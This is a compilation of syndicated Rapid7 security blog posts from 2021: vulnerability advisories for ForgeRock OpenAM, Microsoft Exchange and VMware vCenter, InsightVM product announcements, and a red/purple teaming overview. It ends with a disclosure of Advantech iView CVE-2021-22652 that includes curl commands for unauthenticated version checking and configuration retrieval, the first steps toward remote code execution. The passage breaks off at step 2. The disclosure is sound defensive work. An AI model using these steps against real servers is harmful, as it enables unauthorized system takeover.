As of July 29, 2021 there are no patches for existing versions of ForgeRock Access Manager. Organizations must either upgrade to version 7.x or apply one of the following workarounds:

Option 1

Disable the VersionServlet mapping by commenting out the following section in the AM web.xml file (located in the /path/to/tomcat/webapps/openam/WEB-INF directory):

  <servlet-mapping>        
     <servlet-name>VersionServlet</servlet-name>       
     <url-pattern>/ccversion/*</url-pattern>   
  </servlet-mapping>

To comment out the above section, apply the following changes to the web.xml file:

<!--  
  <servlet-mapping>        
     <servlet-name>VersionServlet</servlet-name>       
     <url-pattern>/ccversion/*</url-pattern>   
  </servlet-mapping>
-->

Option 2

Block access to the ccversion endpoint using a reverse proxy or other method. On Apache Tomcat, ensure that access rules cannot be bypassed using known path traversal issues: Tomcat path traversal via reverse proxy mapping.

The upgrades remove the vulnerable /ccversion HTTP endpoint along with other HTTP paths that used the vulnerable Jato framework.

As of Tuesday, June 29, 2021, Rapid7 Labs has been able to identify just over 1,000 internet-facing systems that appear to be using ForgeRock’s OpenAM solution.

All organizations running ForgeRock OpenAM 7.0.x or lower (or are using the latest release of the Open Identify Platform’s fork of OpenAM) are urged to prioritize upgrading or applying the mitigations within an accelerated patch window if possible, and at the very least within the 30-day window if you are following the typical 30-60-90 day patch criticality cadence.‌‌ Furthermore, organizations that are monitoring web application logs and OpenAM server logs should look for anomalous GET or POST request volume to HTTP path endpoints that include /ccversion in them.

For individual vulnerability analysis, see AttackerKB.

This blog post will be updated with new information as warranted.

Header image photo by Hannah Gibbs on Unsplash

InsightVM Release Announcement: Global Dashboard Filters

Post Syndicated from Dane Grace original https://blog.rapid7.com/2021/06/23/insightvm-release-announcement-globally-dashboard-filters/

InsightVM Release Announcement: Global Dashboard Filters

InsightVM users have been able to create dashboards, add different visualizations in the form of cards and apply filters to these cards. Rapid7 also provided dashboard templates which enabled users to create views focusing on scenarios such as Microsoft’s Patch Tuesday, identifying and assessing Remote assets, highlighting changes in their environment in the last 30 days and many more.

Before today, you would have to apply queries to individual cards to focus these visualizations on particular assets or vulnerabilities — like focusing all of the cards in a dashboard on servers running Ubuntu. InsightVM provides an easy and powerful means to create these filters, but this was cumbersome if a dashboard contained numerous cards.

This is why we’re happy to announce the release of the ability to apply a query to a dashboard and all of the cards will now adjust the results accordingly. To illustrate this, let’s consider a hypothetical InsightVM user named Dana.

Dana is a security engineer at a rapidly expanding, global organization. This company regularly adds new offices around the world. Every office requires new servers and networks, and these assets need to be secured.

Dana’s first task when a new office is acquired is to create a dashboard for each new location using the Significant Changes in the Past 30 Days template. She finds this helps her keep up with changes in the risk posture of their environments. However, every time she creates one of these dashboards, she needs to add a filter to each of the 14 cards to focus on the office for which it’s intended. This task can take up to an hour, which is time she would rather spend on securing her environment.

This release allows Dana to build a query that filters assets for the new office, create the dashboard from the template, and apply the query to the dashboard. All of the cards will focus on the intended location. This whole process takes about five minutes as opposed to 30 minutes and she is now free to turn their attention back to remediating vulnerabilities.

It’s worth noting that Dana is still able to filter cards, but the introduction of global dashboard filtering creates a situation where drilling into specific view is shaped by the filters applied in subsequent views. One can think of this as nested scoping of views within InsightVM.

Nested scoping

Let’s lean on our previous example with Dana. She wants to create a view that accounts for all of the Windows 10 assets in their environment.

She creates a new dashboard using the Significant Changes in the Last 30 Days template and applies a dashboard query that filters for all Windows 10 assets. All of the cards in that dashboard will now reflect the results from that query.

InsightVM Release Announcement: Global Dashboard Filters

Dana then navigates to the expanded view of the Total Asset Trends card. The results here would be filtered by the card query introduced by the template and the dashboard filter introduced by the user.

InsightVM Release Announcement: Global Dashboard Filters

This view can further be refined by loading a query at the card level. In this example, let’s suppose Dana is interested in ICMP vulnerabilities and loads a query that filters for this.

InsightVM Release Announcement: Global Dashboard Filters
InsightVM Release Announcement: Global Dashboard Filters

When Dana navigates to one of the assets listed in this view, the result will respect all subsequent filters. In this example, that would include: the dashboard template filter, the dashboard filter and the card query — that is, the ICMP vulnerabilities on a Windows 10 asset added within the last 30 days.

InsightVM Release Announcement: Global Dashboard Filters

You can see that these changes provide the ability to greatly focus views into your environment.

Changes in the Dashboard Card Filtering Experience

Readers familiar with the previous card filtering experience will notice that we loaded a query into this example, but there was no in-card query builder. The addition of nested scoping complicates the filtering experience and as Spiderman’s Uncle Ben once said, “With great power comes great responsibility.”

We’ve changed the experience to allow customers to create and save queries in the query builder and load those into the cards as opposed to creating ad hoc queries because we found this created confusion in further refining a scope to several previous scope constraints.

While we understand that this change will require some adjustments to your workflows, we are confident that the additional functionality of globally filtered dashboards are well worth the effort.

Attack Surface Analysis Part 3: Red and Purple Teaming

Post Syndicated from Jeffrey Gardner original https://blog.rapid7.com/2021/06/22/attack-surface-analysis-part-3-red-and-purple-teaming/

Part 3: Red and Purple Teaming

Attack Surface Analysis Part 3: Red and Purple Teaming

This is the third and final installment in our 2021 series around attack surface analysis. In part 1 I offered a description and the value and challenge of vulnerability assessment. Part 2 explored the why and how of conducting penetration testing and gave some tips on what to look for when planning an engagement. In this installment I’ll detail the final 2 analysis techniques—red and purple teaming.

Previously, we rather generically defined a red team engagement as a capabilities assessment. Time to get a little more specific with our terminology with a better definition, once again courtesy of NIST:

“A [red team is a] group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. The Red Team’s objective is to improve enterprise cybersecurity by demonstrating the impacts of successful attacks and by demonstrating what works for the defenders (i.e., the Blue Team) in an operational environment.”

(Source: https://csrc.nist.gov/glossary/term/Red_Team)

If you’re scratching your head about now thinking “well, that sounds awful similar to a pentest,” I’ve put together the following table to help really illustrate the differences:

Attack Surface Analysis Part 3: Red and Purple Teaming

Additionally, like the various methodologies available for pentesting, red teams have different options in how they perform their engagements. The most common methodology that many of you have no doubt heard of is the MITRE ATT&CK framework, but there are others out there. Each of the options below has a different focus, whether it be red teaming for financial services or threat intel-based red teaming, so there is a flavor available to meet your needs:

  1. TIBER-EU—Threat Intelligence-Based Ethical Red Teaming Framework
  2. CBEST—Framework originating in the UK
  3. iCAST—Intelligence-Led Cyber Attack Simulation Testing
  4. FEER—Financial Entities Ethical Red Teaming
  5. AASE—Adversarial Attack Simulation Exercises
  6. NATO—CCDCOE red team framework

You may be thinking, “There’s no way I can stand up an internal red team, and I don’t have the budget for a professional engagement, but I would really like to test my blue team. How can I do this on my own!?” Well, you don’t have to! There are plenty of open source tools available to help you take that first step. While the following tools are nowhere near as capable or extensive as a human-led team, they do give a number of useful insights into potential weaknesses in your detection and response capabilities:

  1. APTSimulator—Batch script for Windows that makes it look as if a system were compromised
  2. Atomic Red Team—Detection tests mapped to the MITRE ATT&CK framework
  3. AutoTTP—Automated Tactics, Techniques & Procedures
  4. Blue Team Training Toolkit (BT3)—Software for defensive security training
  5. Caldera—Automated adversary emulation system by MITRE that performs post-compromise adversarial behavior within Windows networks
  6. DumpsterFire—Cross-platform tool for building repeatable, time-delayed, distributed security events
  7. Metta—Information security preparedness tool
  8. Network Flight Simulator—Utility used to generate malicious network traffic and help teams to evaluate network-based controls and overall visibility
  9. Red Team Automation (RTA)—Framework of scripts designed to allow blue teams to test their capabilities, modeled after MITRE ATT&CK
  10. RedHunt-OS—Virtual machine loaded with a number of tools designed for adversary emulation and threat hunting

Lastly, before we head into a description of purple teaming, I want to reiterate what we’ve discussed this far. The goal of a red team engagement is not just discovering gaps in the detection and response capabilities of an organization. The purpose is to discover the blue team’s weaknesses in terms of processes, coordination, communication, etc., with the list of detection gaps being a byproduct of the engagement itself.

Purple Teaming

While the name may give away the upcoming discussion (red team + blue team = purple team), the purpose of the purple team is to enhance information sharing between both teams, not to replace or combine either team into a new entity.

  • Red Team = Tests an organization’s defensive processes, coordination, etc.
  • Blue Team = Understands attacker TTPs and designs defenses accordingly
  • Purple Team = Ensures both teams are cooperating
  • Red teams should share TTPs with the blue team
  • Blue teams should share knowledge of defensive actions with the red team

Realistically, if both of your teams are already doing this, then congratulations! You have a functional purple team. However, if you’re like me and are a fan of more form and structure, check out the illustration below:

Attack Surface Analysis Part 3: Red and Purple Teaming

(Source: https://github.com/DefensiveOrigins/AtomicPurpleTeam)

Seems pretty simple right? In theory it is, but in practice it gets a little more difficult (though probably not in the way you’re thinking). The biggest hurdle to effective purple teaming is helping the blue and red teams overcome the competitiveness that exists between them. Team Blue doesn’t want to give away how they catch bad guys, and Team Red doesn’t want to give away the secrets of the dark arts. By breaking down those walls you can show Blue they’re better defenders by understanding how Red operates, and Red that they can enhance their effectiveness by expanding their knowledge of defensive operations in partnership with Blue. In this way, the teams will actually want to work together (and dogs and cats will start living together, MASS HYSTERIA).

I hope the information above is helpful as you determine which analysis strategy makes sense for you! Check out the other posts in this series for more information on additional analysis techniques to take your program to the next level:

Part 1: Vulnerability Scanning                                     Part 2: Penetration Testing

Mass Exploitation of Exchange Server Zero-Day CVEs: What You Need to Know

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/

Mass Exploitation of Exchange Server Zero-Day CVEs: What You Need to Know

On March 2, 2021, the Microsoft Threat Intelligence Center (MSTIC) released details on an active state-sponsored threat campaign exploiting four zero-day vulnerabilities in on-premises instances of Microsoft Exchange Server. MSTIC attributes this campaign to HAFNIUM, a group “assessed to be state-sponsored and operating out of China.”

Rapid7 detection and response teams have also observed increased threat activity against Microsoft Exchange Server since Feb. 27, 2021, and can confirm ongoing mass exploitation of vulnerable Exchange instances. Microsoft Exchange customers should apply the latest updates on an emergency basis and take immediate steps to harden their Exchange instances. We strongly recommend that organizations monitor closely for suspicious activity and indicators of compromise (IOCs) stemming from this campaign. Rapid7 has a comprehensive list of IOCs available here.

The actively exploited zero-day vulnerabilities disclosed in the MSTIC announcement as part of the HAFNIUM-attributed threat campaign are:

  • CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server.
  • CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gives an attacker the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.
  • CVE-2021-26858 is a post-authentication arbitrary file write vulnerability in Exchange. If an attacker could authenticate with the Exchange server, they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.
  • CVE-2021-27065 is a post-authentication arbitrary file write vulnerability in Exchange. An attacker who can authenticate with the Exchange server can use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin’s credentials.

Also included in the out-of-band update were three additional remote code execution vulnerabilities in Microsoft Exchange. These additional vulnerabilities are not known to be part of the HAFNIUM-attributed threat campaign but should be remediated with the same urgency nonetheless:

Microsoft has released out-of-band patches for all seven vulnerabilities as of March 2, 2021. Security updates are available for the following specific versions of Exchange:

  • Exchange Server 2010 (for Service Pack 3—this is a Defense in Depth update)
  • Exchange Server 2013 (CU 23)
  • Exchange Server 2016 (CU 19, CU 18)
  • Exchange Server 2019 (CU 8, CU 7)

Exchange Online is not affected.

For Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to these vulnerabilities with authenticated vulnerability checks. Customers will need to perform a console restart after consuming the content update in order to scan for these vulnerabilities.

InsightIDR will generate an alert if suspicious activity is detected in your environment. The Insight Agent must be installed on Exchange Servers to detect the attacker behaviors observed as part of this attack. If you have not already done so, install the Insight Agent on your Exchange Servers.

For individual vulnerability analysis, see AttackerKB.

Building a Holistic VRM Strategy That Includes the Web Application Layer

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/02/25/building-a-holistic-vrm-strategy-that-includes-the-web-application-layer/

Building a Holistic VRM Strategy That Includes the Web Application Layer

Building security into your overall vulnerability risk management (VRM) strategy is a must-do in the age of the all-important web app. Between security and IT-Ops teams, there are a number of steps in the VRM process, including asset identification, enumeration, prioritization, and remediation. How does application security fit in?

Co-sponsored by Forrester, a recent Rapid7 webcast expounds upon the topics discussed in this blog post. The distinguished subject-matter experts and presenters also dive deep into the nitty gritty of what it takes to get a better night’s sleep by creating a VRM strategy that extends to the application layer. Watch the webcast here, and read on for our recap below!

Web applications and APIs are assets, too

Applications are one of the most common ways attackers are getting in. In a recent survey, Forrester found that 31% of firms suffered a breach as a result of an external attack, with applications serving as one of the most common attack vectors. Along with all other assets in a VRM program, web apps must be prioritized as assets that need to be covered.

Knowing this, security leaders have started to think harder about application security. But just because it’s a top priority, does that mean it’s the company’s? Bringing stakeholders into the process early is key, because getting that application layer covered affects the entire organization. The more buy-in and support from everyone who has a stake in getting secure products to customers, the more value everyone gets from a comprehensive VRM investment.

Building security in

Buy-in comes from building in. Static Application Security Testing (SAST) is a process that can find flaws early in the life cycle of applications, providing guidance to dev teams so they can find and fix issues early in the process. Adopting SAST in the development phase means making it easier for developers to remediate as they’re coding.

Further, Software Composition Analysis (SCA) tools can help analyze the open-source libraries and third-party components that go into creating a large portion of today’s applications. A modern VRM program also needs to consider these components as assets to cover. Building these processes and tools into the Software Development Lifecycle (SDLC) will help dev teams experience fewer security flaws, get real-time education, and eventually find the ability to scale quickly.

However, as development approaches change, more and more organizations are struggling to identify and secure the sheer number of APIs built into their applications. Security teams might understandably be rushing to keep up with:

  • Identifying and cataloging APIs and endpoints
  • Assuring and managing API user identities
  • Meeting regulatory and compliance requirements        

How can security pros start thinking about baking those processes in earlier?

Understanding API security

There is no single tool for API security. A holistic approach includes identifying what sorts of APIs are out there, assessing them for organizational fit, and scanning and testing them for vulnerabilities. It also includes managing them throughout deployment and production. Does the traffic match how you expect the API to behave?

Looking at API security from the client to the backend is also key. Not only does your existing application tooling need to be inclusive of API behavior, but additional tooling may be of great insight when looking at API-specific issues like managing authentication and authorization. Remember, new development methodologies will requite new security patterns.

Zoom out: What are you looking to accomplish?

When it comes to rethinking or building a sound VRM strategy, performing foundational work up front will help get organizational buy-in faster. It’ll take time to inventory everything that’s sitting at the edge, from web applications to APIs to third-party vendors. Recognizing that a significant shift will take time and being transparent about this with stakeholders can only help streamline the process. So, why invest the time?

As more people than ever before shift to a work-from-home environment, organizations may not feel as safe as they once did having corporate information residing on endpoints scattered around the city and, indeed, the world. Following along naturally to this issue is increased questioning and anxiety from cyber-insurers and auditors, particularly as it concerns things like an organization’s supply chain and partners. Much like the recent SolarWinds incident, an attack on one organization can quickly escalate into a threat against its partners.  

If you’re part of an organization beginning to engage more with your existing supply chain or validations, it’s important to remember that you are also part of their chain. So, it can be a reciprocal nature of checks and scrutiny as more partners come online. In this entire ecosystem, a good rule of thumb is to remember that exploitation has a real cost—whether the attacker’s intent is simply to disseminate sensitive data or there’s a ransom scenario afoot. Defining security frameworks and testing them against overall goals can help translate processes down into each project as well as speed up validation with a potential partner.

Extend, extend, extend

When it comes to rethinking or building a sound VRM strategy, extending that foundational security work to your web applications at the edge is a modern best practice that can yield many benefits—whether it’s protecting against someone probing for their own nefarious purposes or looking to sell that information down the line. It can also start to create an ingrained culture of taking proactive and protective steps to secure applications and the tools on which they’re built.  

For more information about broadening your VRM strategy to include the application layer, please watch our webcast with Forrester here.

VMware vCenter Server CVE-2021-21972 Remote Code Execution Vulnerability: What You Need to Know

Post Syndicated from boB Rudis original https://blog.rapid7.com/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/

VMware vCenter Server CVE-2021-21972 Remote Code Execution Vulnerability: What You Need to Know

This blog post was co-authored by Bob Rudis and Caitlin Condon.

What’s up?

On Feb. 23, 2021, VMware published an advisory (VMSA-2021-0002) describing three weaknesses affecting VMware ESXi, VMware vCenter Server, and VMware Cloud Foundation.

Before digging into the individual vulnerabilities, it is vital that all organizations that use the HTML5 VMware vSphere Client, i.e., VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2) immediately restrict network access to those clients—especially if they are not segmented off on a management network—implement the mitigation noted below, and consider performing accelerated/immediate patching on those systems.

Vulnerability details and recommendations

CVE-2021-21972 is a critical (CVSSv3 base 9.8) unauthenticated remote code execution vulnerability in the HTML5 vSphere client. Any malicious actor with access to port 443 can exploit this weakness and execute commands with unrestricted privileges.

PT Swarm has provided a detailed walkthrough of this weakness and how to exploit it.

Rapid7 researchers have independently analyzed, tested, and confirmed the exploitability of this weakness and have provided a full technical analysis.

Proof-of-concept working exploits are beginning to appear on public code-sharing sites.

Organizations should restrict access to this plugin and patch affected systems immediately (i.e., not wait for standard patch change windows).

VMware has provided steps for a temporary mitigation, which involves disabling the plugin.

CVE-2021-21973 is an important (CVSSv3 base 8.8) heap-overflow-based remote code execution vulnerability in VMware ESXi OpenSLP. Attackers with same-segment network access to port 427 on affected systems may be able to use the heap-overflow weakness to perform remote code execution.

VMware has provided steps for a temporary mitigation, which involves disabling the SLP service on affected systems.

Rapid7 recommends applying the vendor-provided patches as soon as possible after performing the vendor-recommended mitigation.

CVE-2021-21974 is a moderate (CVSSv3 base 5.3) server-side request forgery vulnerability affecting the HTML5 vSphere Client. Attackers with access to port 443 of affected systems can use this weakness to gain access to underlying system information.

VMware has provided steps for a temporary mitigation, which involves disabling the plugin.

Since attackers will already be focusing on VMware systems due to the other high-severity weaknesses, Rapid7 recommends applying the vendor-provided patches as soon as possible after performing the vendor-recommended mitigation.

Attacker activity

Rapid7 Labs has not detected broad scanning for internet-facing VMware vCenter servers, but Bad Packets has reported that they’ve detected opportunistic scanning. We will continue to monitor Project Heisenberg for attacker activity and update this blog post as we have more information.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Take the Full-Stack Approach to Securing Your Modern Attack Surface

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/02/19/take-the-full-stack-approach-to-securing-your-modern-attack-surface/

Take the Full-Stack Approach to Securing Your Modern Attack Surface

A growing remote-work culture demands a graduation in the approach to security. It’s time to test, monitor, secure, and extend to the application layer.

A modern methodology for vulnerability management (VM) is vital for organizations looking to minimize attack surfaces by prioritizing potential threats. This includes identifying, evaluating, treating, and reporting on security risks across key systems and the software that runs on them. An example of this full-stack approach includes broader coverage of on-premises and virtual environments, inclusive of web-application testing, and leveraging best-in-class practices and tools.

A good place to start is establishing an asset management solution. Gaining a full understanding of the vulnerabilities associated with each asset across the network is key to informing stakeholders, prioritizing vulnerabilities, and remediating issues. Due to the persisting COVID-19 pandemic, these assets are increasingly part of a growing remote workforce continuously expanding every organization’s attack surface. As assets are no longer regularly connecting to corporate networks, traditional vulnerability scans aren’t possible.

This has paved the way for agents to plug that particular vulnerability. For instance, Rapid7’s Insight Agent is lightweight data-collection software you can install on any cloud-based asset.  Let’s take a more in-depth look at modern vulnerability risk management (VRM) and what to look for in a holistic solution.

The need for speed

The COVID-19 pandemic has accelerated the evolution of security and protections for an unplanned, exponential growth in the global remote workforce. This means a faster digital transformation for every industry and organization. It means a faster pace of spinning up and scaling new apps. And it means quickening cloud adoption as IT teams scramble for accessible and reliable places to host mission-critical services. So how do we go about securing every layer in this new era of VRM?

  • Prioritizing vulnerabilities is more important than ever. Limited time and an ever-changing threat landscape make it unrealistic for teams to try and fix everything. Scrambling to do so could mean critical threats escaping through the cracks.
  • Developing strong partnerships has new meaning because, most likely, those partnerships will be virtual for the foreseeable future. Thus extra attention must be paid to maintaining them so there are more reliable eyes monitoring for vulnerabilities and ready to jump into action if a threat arises.  
  • Incorporating a full-stack approach means testing traditional and cloud infrastructure, and extends to the applications those environments host. Teams must move carefully, but also expediently when leveraging scan engines and agents to remotely monitor servers.  

With the acceleration of seemingly all security processes, it’s also important to remember to take stock of what’s working and what’s not. No matter how many fancy features, a solution is only worth the investment if it meets your organization’s unique needs and drives eventual ROI.

About that application layer

Gaining real-time understanding of an attack on your web apps provides actionable intelligence for quick remediation while providing an opportunity for a team teaching moment for the next time it happens. InsightAppSec and tCell from Rapid7 is a test-monitor-prevent solution that focuses on neutralizing vulnerabilities at the application layer.    

With guided remediation into web app flaws, you can begin building a road map for making more secure applications. You’ll start by scanning your applications in as few as five minutes so you can get visibility into the weaknesses that exist in your applications. From there, you’ll be able to view severity and remediation guidance, and share with key stakeholders to allow you to collaborate faster and scale easier. Scan on- and off-premises apps with InsightAppSec’s powerful cloud engines, accessing all of your internal and external scan configurations from a central console.

The ability to monitor more apps in more environments will be key for the future of your business, and is an extra layer of protection for vulnerabilities you can’t remediate in time. Finding solutions that include functionality to help your remediation stakeholders understand the context of the associated vulnerabilities (Attack Replay, granular remediation guidance, etc.) will allow you to partner more effectively.

An increased reliance on direct-to-cloud app deployment is a natural evolution. Benefits like higher baseline security, automated hardening, and increased flexibility are attractive. But all of that demands more time and more vigilance.

But what about the infrastructure? (People and machines)

Consider this: It’s not just about remediation, it’s also how you navigate the red tape. Grasping a more complete picture of how vulnerabilities translate to business risk is key not only for communicating those risks to higher-ups, but also maintaining and growing things like team headcount. After all, you have to have people to solve the problems. InsightVM, Rapid7’s vulnerability management solution, can help you understand and prioritize risk, with clarity.

Assume everything along your attack surface is being targeted by threat actors. These days, the reports of malicious events are coming more frequently. But covering local, remote, cloud, containerized, and virtual infrastructure is possible with InsightVM. It’s not a guaranteed catch-all solution, but it does provide the shared view and common language that can bring together traditionally siloed teams. It also paves the way for collaboration and accountability between those teams, making it easier for remediators to drive impact, celebrate progress, and improve ROI.  

With more fully supported integrations than any other VM vendor as well as the ability to automate virtually any aspect of vulnerability scanning with RESTful API, it’s now possible to get a near-complete story of the security of your infrastructure and how it affects business.

A fortified foundation

Together, InsightVM and InsightAppSec can be complementary solutions to security organizations looking to tailor or refine any on-premises, off-premises, or hybrid VRM program.  

  • Comprehensive visibility at the infrastructure layer empowers you to leverage people more efficiently.
  • Click-and-scan security testing at the application layer enables rapid return of actionable results … and peace of mind.
  • Robust reporting capabilities featured in both solutions make it easy to measure progress and report it to key stakeholders.
  • A single pane of glass is the best way to see real-time processes at work as well as the overall security status of your world.

A full-stack approach can help you secure every layer of your attack surface. Then someday, perhaps we won’t call it an “attack” surface anymore.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Post Syndicated from Dane Grace original https://blog.rapid7.com/2021/02/12/new-insightvm-dashboard-helps-you-discover-significant-changes-in-your-environment-from-the-past-30-days/

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Organizations are in a constant struggle to identify and reduce risks in their constantly changing environments. These changes may manifest by several means and can be recurring events.

For example:

  1. Laptops and other devices are commissioned or decommissioned due to changes in the workforce.
  2. Your security tool discovers that assets in your environment contain several vulnerabilities recently discovered by researchers.
  3. New software or services are deployed to your organization that introduce new risk via new vulnerabilities.
  4. Your IT team deployed a round of patches to local assets, which significantly decreased the number of vulnerabilities in your environment.

The obvious challenge here is that these changes create moving targets and security teams need to quickly identify, prioritize and remediate risk as it’s introduced. We developed our Significant Changes in the Last 30 Days dashboard in InsightVM in order to provide a lens through which we can highlight the differences in your environment from the past 30 days to present day, as well as the ability to pivot the findings into a Remediation Project directly from the dashboard.

Users may easily create this dashboard by selecting the template titled “Significant Changes in the Last 30 days.” This action will create a local copy of the dashboard for you and save three new asset queries in your query library. These queries are:

  • Assets Discovered in the Last 30 Days,
  • Critical Vulnerabilities Discovered in the Last 30 Days
  • Vulnerabilities Discovered in the Last 30 Days

These queries all filter the cards on the dashboard, and we’ve added the ability to view the queries applied to this Dashboard, which will allow you to further focus the finding on the dashboard.

Users are completely able to add and remove cards as they wish. However, the following cards are included in the template:

This card shows the total number of assets in your environment, as well as the total number of new assets in the past 30 days and the total percentage of increase.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Number of Critical Vulnerabilities Found in the Last 30 Days

These are the total number of vulnerabilities with a severity of “critical” found within the last 30 days of the current date.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Number of Exploitable Critical Vulnerabilities Found in the Last 30 Days

This card shows all vulnerabilities with a severity of critical and known exploits. These provide a powerful view into vulnerabilities attackers could easily exploit.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

New vs. Remediated Vulnerabilities

This card shows the number and percentage of new, remediated, and unchanged vulnerability findings. This is powerful in showing which vulns in your environment have been addressed, which are new, and which have remained static.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Assets by Risk and Vulnerabilities Found in the Last 30 Days

This visualization helps you identify the riskiest assets in your environment based on the number of vulnerabilities and the associated risk score. The size of the bubbles indicates how many assets exist for a given vulnerability count and risk score range.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Vulnerabilities by CVSS Score

This card shows the vulnerabilities found in your environment in the past 30 days grouped by CVSS score range (e.g., CVSS 7.0–10).

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Newly Discovered Vulnerabilities by Total Risk Score

This card allows users to leverage our Real Risk score in order to identify and prioritize vulnerabilities discovered in the past 30 days.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Assets With Actively Targeted Vulnerabilities

This card is intended to enable users to identify vulnerabilities that are actively being targeted in the wild, and therefore presenting a great degree of risk.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Assets by Number of Running Containers

This card is intended to identify risk exposure by showing container hosts and the total number of containers running on these.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Top Riskiest Assets

This card lists the riskiest assets discovered in the past 30 days, allowing teams to prioritize remediations that will help reduce risk quickly.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Most Common Software

This card shows the software most commonly used in their environment, allowing teams to prioritize their efforts at those items with the greatest surface area.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Most Common Services

This card shows the services most commonly deployed in their environment, giving them insight into what could be of the most importance.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

New Vulnerability Findings

This card shows the total number of vulnerability findings  discovered in the past 30 days, and expanding this view shows a list of these. This allows teams to identify recent vulnerabilities and prioritize those accordingly.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Remediated Vulnerability Findings

Finally, some positive news. This card demonstrates remediated vulnerabilities in the past 30 days, and this allows teams to demonstrate their progress on a monthly basis.

New InsightVM Dashboard Helps You Discover Significant Changes in Your Environment from the Past 30 Days

Per usual, users are able to arrange cards per their desires as well as share these with team members. We think this dashboard has the potential to provide deep visibility into changes in their environments and we hope this will help drive customers to a safer state.

Not an InsightVM customer? Watch this on-demand demo to see our vulnerability risk management solution in action.

Watch Now

CVE-2021-22652: Advantech iView Missing Authentication RCE (FIXED)

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/

CVE-2021-22652: Advantech iView Missing Authentication RCE (FIXED)

Advantech iView versions prior to 5.7.03.6112 suffer from an instance of "CWE-306: Missing Authentication For Critical Function." This vulnerability (CVE-2021-22652) has a CVSSv3 score of 9.8, which is usually CRITICAL, since it effectively allows anyone who can connect to the iView server to run arbitrary, OS-level commands in the user context of the iView application, which is nearly always SYSTEM-level access.

Product description

Advantech iView is a proprietary, SNMP-based IoT device management application used to manage deployments of Advantech B+B SmartWorx-enabled products, as described on the vendor’s product site.

Credit

This issue was discovered by Rapid7 Senior Security Researcher William Vu. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy and in cooperation with the Industrial Control Systems Vulnerability Management and Coordination (ICS-VMC) section of the Cybersecurity and Infrastructure Security Agency (CISA), a division of the U.S. Department of Homeland Security.

Exploitation of CVE-2021-22652 (FIXED)

An unauthenticated configuration change combined with an unauthenticated file write primitive leads to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT AUTHORITY\SYSTEM. This issue was demonstrated in the vulnerable version 5.7.02.5992 and fixed in version 5.7.03.6112.

The vulnerability can be demonstrated with the following series of curl(1) commands:

Step 0: Confirm vulnerable version

This is just to confirm that we’re running a vulnerable version.

Note: Replace all instances of [RHOST] with your target IP.

wvu@kharak:~$ curl -s http://[RHOST]:8080/iView3/MenuServlet -d "page_action_type=getMenuFragment&page=version.frag" | xmllint --html --xpath 'string(//input[starts-with(@value, "Version")]/@value)' - 2> /dev/null | paste -
Version 5.7 (Build 0002.5992)
wvu@kharak:~$

Version 5.7.02.5992 is detected. This check is unauthenticated.

Step 1: Retrieve iView configuration

This is to ensure we are modifying only the values we need.

wvu@kharak:~$ curl -s http://[RHOST]:8080/iView3/NetworkServlet -d page_action_type=retrieveSystemSettings | jq -c .[0]
{"PROMPATH":"c:\\IMCTrapService\\prom_bin\\","EXPORTPATH":"c:\\IMCTrapService\\export\\","IMPORTPATH":"c:\\IMCTrapService\\import\\","CONFIGPATH":"c:\\IMCTrapService\\config\\","DBBACKUPPATH":"c:\\IMCTrapService\\backup\\","ZTPTEMPLATESPATH":"c:\\IMCTrapService\\templates\\","SSHPORT":"22","TFTPPORT":"69","MAXBACKUPFILES":"3","NETWORKSCANTIMEOUT":"20","USERSESSIONTIMEOUT":"0","USECUSTOMNAMING":"0","CUSTOMNAMETEMPLATE":""}
wvu@kharak:~$

As you can see, the configuration is returned as a JSON object.

Step 2: Update EXPORTPATH to webapps\iView3\

A relative path can be used, since the working directory is the Tomcat folder. This saves us from having to choose between C:\Program Files and C:\Program Files (x86).

